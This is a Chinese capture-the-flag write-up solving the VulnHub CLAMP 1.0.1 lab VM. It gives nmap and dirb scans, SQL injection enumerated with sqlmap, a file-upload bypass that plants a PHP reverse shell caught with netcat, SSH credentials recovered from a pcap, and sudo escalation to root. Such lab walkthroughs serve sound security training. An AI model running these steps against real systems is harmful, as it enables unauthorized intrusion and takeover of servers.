CLAMP 1.0.1靶机

信息收集:

复制代码
靶机地址:https://www.vulnhub.com/entry/clamp-101,320/

(1)ip扫描,net扫不到换仅主机就行了

复制代码
nmap 192.168.8.0/24 -sn | grep -B 2 '00:0C:29:48:66:90'

(2)端口扫描

复制代码
nmap 192.168.8.130 -p- -A -sV -Pn

(3)目录扫描

复制代码
dirb http://192.168.8.130

(4)访问80端口,f12查看源码,提示让我扫描更多

(5)使用dirsearch,换了几个大一些的字典,但是没扫出来,访问 /nt4stopc/,下面有一些问题,提示必须收集答案

(6)都是一些判断题,对与错对应1与0,最后结果为

复制代码
0110111001

(7)点击图中位置,发现存在参数,php语言,尝试注入

(8)and 1=1 --+ 显示正常

(9)and 1=2 --+ 显示异常

(10)是存在注入的,使用 sqlmap 跑一下

复制代码
python3 sqlmap.py -u "http://192.168.8.130/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

库名:

tatil 下表名:

gereksiz 下得到一串值:

复制代码
hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf  folder upload.php

解码后得到:
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

(11)可能还是路径,拼接访问

复制代码
http://192.168.8.130/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/

(12)再拼接 upload.php

复制代码
http://192.168.8.130/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/upload.php

(13)文件上传,以md5提交,但是没有提交按钮,自己在前端给加一个

复制代码
<input type="submit">

getshell:

(1)kali 生成反弹 shell

复制代码
locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

(2)上传该文件后,返回了文件路径,文件名为md5加密后的

复制代码
osas/2ad6bded962b884337eaeb921d7c2764.php

http://192.168.8.130/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php

(3)nc监听,访问文件,成功反弹shell

提权:

(1)使用 python 提升交互性

复制代码
python3 -c 'import pty;pty.spawn("/bin/bash")'

(2)在 /var/www/html 下发现 important.pcapng

(3)查看文件,发现内容

复制代码
email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+just+mail+it.++Good+work

(4)url解码,得到以下数据

复制代码
email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work

账号密码:
mkelepce:mklpc-osas112.

(5)ssh连接,连接成功

复制代码
ssh mkelepce@192.168.8.130
mklpc-osas112.

(6)查看当前权限

复制代码
sudo -l
mklpc-osas112.

(7)sudo su 提权成功

相关推荐
大方子17 小时前
【PolarCTF】rce1
网络安全·polarctf
枷锁—sha18 小时前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南
网络·安全·网络安全
聚铭网络19 小时前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位
网络安全
darkb1rd21 小时前
八、PHP SAPI与运行环境差异
开发语言·网络安全·php·webshell
世界尽头与你1 天前
(修复方案)基础目录枚举漏洞
安全·网络安全·渗透测试
枷锁—sha2 天前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1192 天前
3.1_网络——基础
网络·安全·web安全·http·网络安全
ESBK20252 天前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信
旺仔Sec2 天前
一文带你看懂免费开源 WAF 天花板!雷池 (SafeLine) 部署与实战全解析
web安全·网络安全·开源·waf
七牛云行业应用2 天前
Moltbook一夜崩盘:150万密钥泄露背后的架构“死穴”与重构实战
网络安全·postgresql·架构·高并发·七牛云